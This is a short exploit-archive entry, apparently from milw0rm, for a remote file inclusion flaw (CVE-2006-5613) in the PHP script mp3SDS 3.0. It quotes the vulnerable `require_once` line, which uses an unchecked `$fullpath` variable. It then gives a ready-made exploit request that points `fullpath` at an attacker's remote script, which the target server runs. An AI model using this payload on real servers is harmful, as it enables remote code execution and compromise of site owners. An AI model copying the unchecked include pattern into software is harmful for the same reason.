[] NeoSense

mp3SDS 3.0 - '/Core/core.inc.php' Remote File Inclusion

Author: Mehmet Ince
type: webapps
platform: php
port: nan
date_added: 2006-10-27 
date_updated: 2006-10-28 
verified: 1 
codes: OSVDB-30110;CVE-2006-5613 
tags: 
aliases:  
screenshot_url:  
application_url: 

Script: MP3 Streaming DownSampler for PHP v3.0 (fullpath) Remote File Include Exploit
Version: 3.0
Script Download: http://damac.us/Projects/mp3SDS/archive/mp3SDS-3.0.tgz
Code: require_once("$fullpath/Core/FormatName.fnc.php");
Exploit: Core/core.inc.php?fullpath=evilscripts?
Found: Cyber-Security
Thanx: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide

# milw0rm.com [2006-10-28]